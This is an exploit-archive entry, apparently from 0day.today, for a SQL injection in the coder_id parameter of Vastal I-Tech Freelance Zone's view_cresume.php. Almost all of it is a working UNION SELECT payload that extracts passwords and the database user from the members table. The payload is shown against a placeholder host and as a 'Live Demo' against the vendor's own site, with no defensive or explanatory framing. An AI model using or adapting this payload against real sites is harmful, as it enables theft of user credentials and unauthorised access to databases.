id: 3610
date: 09/04/2008
title: Vastal I-Tech Freelance Zone (coder_id) SQL Injection Vulnerability
author: Stack
cves: 

===================================================================
Vastal I-Tech Freelance Zone (coder_id) SQL Injection Vulnerability
===================================================================



#######################################################
#  Vastal I-Tech Freelance Zone SQL Injection Vulnerability
#
# Author   : Stack
#
#
# Demo      : http://www.vastal.com/freelance/
#######################################################
the exploit fate the password
use ur mind for have the column username
Exploit:
http://site.il/view_cresume.php?coder_id=-1/**/UNION/**/SELECT/**/1,2,password,user(),5/**/from/**/members/*
Live Demo
http://www.vastal.com/freelance/view_cresume.php?coder_id=-1/**/UNION/**/SELECT/**/1,2,password,user(),5/**/from/**/members/*



#  0day.today [2023-03-25]  #